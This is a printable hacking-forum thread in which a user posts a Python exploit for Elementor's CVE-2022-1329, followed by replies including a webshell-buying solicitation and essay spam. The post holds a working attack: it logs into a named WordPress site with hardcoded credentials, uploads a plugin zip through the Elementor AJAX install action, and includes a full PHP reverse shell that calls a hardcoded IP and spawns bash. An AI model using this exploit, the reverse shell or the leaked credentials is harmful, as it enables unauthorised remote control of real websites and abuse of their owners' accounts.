![]() |
|
Leak CVE-2022-1329 vulnerability exploit - Printable Version +- Sinisterly (https://sinister.li) +-- Forum: Hacking (https://sinister.li/Forum-Hacking) +--- Forum: Website & Server Hacking (https://sinister.li/Forum-Website-Server-Hacking) +--- Thread: Leak CVE-2022-1329 vulnerability exploit (/Thread-Leak-CVE-2022-1329-vulnerability-exploit) |
CVE-2022-1329 vulnerability exploit - bugsbunny - 08-04-2022 Hi all, I leave you an exploit I created to exploit Elementors CVE-2022-1329 vulnerability: Code: #!/usr/bin/python
import requests
import re
requests.packages.urllib3.disable_warnings()
'''
payload content:
Create a zip file named payload.zip that contains a file called elementor-pro.php with your payload.
example:
(php reverseshell)
<?php
/**
* Plugin Name: Elementor Pro
*/
set_time_limit (0);
$VERSION = "1.0";
$ip = '133.198.33.194';
$port = 443;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/bash -i';
$daemon = 0;
$debug = 0;
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>
'''
payloadFileName = 'payload.zip'
baseUrl = 'https://share.s21sec.com/'
username = 'mcaballero'
password = 'P(9NE@Zw*R0P9]SpB1Vo'
# creds found on https://github.com/unaitxebrria/escaneo_vulnerabilidades_internas/blob/main/scripts/wordpress_scanner.php https://github.com/unaitxebrria/escaneo_vulnerabilidades_internas/blob/main/results/Vulnerability%20report.json
session = requests.Session()
cookies = { 'wordpress_test_cookie' : 'WP+Cookie+check' }
def DoLogin(username, password):
global cookies
loginUrl = baseUrl + 'wp-login.php'
adminUrl = baseUrl + 'wp-admin/'
data = { 'log' : username, 'pwd' : password, 'wp-submit' : 'Login', 'redirect_to' : adminUrl, 'testcookie' : 1 }
regexp = re.compile('"ajax":\\{"url":".+admin\\-ajax\\.php","nonce":"(.+)"\\}')
response = session.post(loginUrl, cookies=cookies, data=data,verify=False)
search = regexp.search(response.text)
if not search:
print('Error - Invalid credentials?')
else:
print("NONCE")
nonce_raw = search.group()
nonce_ok = nonce_raw[76:86]
return nonce_ok
def UploadFile(fileName, nonce):
uploadUrl = baseUrl + 'wp-admin/admin-ajax.php'
data = { 'action' : 'elementor_upload_and_install_pro', '_nonce' : nonce }
files = { 'fileToUpload' : open(fileName, 'rb') }
regexp = re.compile('"elementorProInstalled"')
response = session.post(uploadUrl, data=data, files=files,verify=False)
search = regexp.search(response.text)
if not search:
print ('Error - Upload failed')
return False
else:
print ('Upload completed successfully!')
return True
def ActivatePayload():
payloadUrl = baseUrl + 'index.php?activate=1'
session.get(payloadUrl)
print('Trying to login...')
nonce = DoLogin(username, password)
print('Nonce found: ' + nonce)
print('Uploading payload...')
fileUploaded = UploadFile(payloadFileName, nonce)
print ('Activating payload...')
ActivatePayload()
print('Payload activated!') Hope this exploit can be useful for you. RE: CVE-2022-1329 vulnerability exploit - odin221b - 08-04-2022 Great. I am going to try it. RE: CVE-2022-1329 vulnerability exploit - Velinux688 - 08-05-2022 Do you know webshell. . hey bro I need buy shell everyday。。 .php ..http/https -company buy shells for SEO. ---random da/ip If willing to sell, please contact me. We can discuss the issue of unit price. I need a hacker seller who can provide a stable supply. pls feel free contact me。。 TG @COF65 ICQ @venda876 RE: CVE-2022-1329 vulnerability exploit - JasonSmith - 08-23-2022 I will try to do this too. Are you searching for a free essay writing website? If you are not able to understand how to write an essay then you can take the help of this website https://writinguniverse.com/free-essay-examples/of-mice-and-men/ Of mice and men has widespread topics that can be examined in any culture and time. John Steinbeck composed lessons of the heart, lessons that instruct children on what it is to be a human being with sympathy for this individual person and a social inner voice. RE: CVE-2022-1329 vulnerability exploit - samrib - 09-02-2022 Nice, great work post on github/lab RE: CVE-2022-1329 vulnerability exploit - ZetaAlphaBeta - 09-06-2022 great code, going to give this a try RE: CVE-2022-1329 vulnerability exploit - visishiat - 10-01-2022 Thanks for the Elementor exploit mate, appreciated RE: CVE-2022-1329 vulnerability exploit - pugoflife - 10-07-2022 thank you, will have to review and get back to you
RE: CVE-2022-1329 vulnerability exploit - Zpressure - 05-07-2023 What exactly does this do? |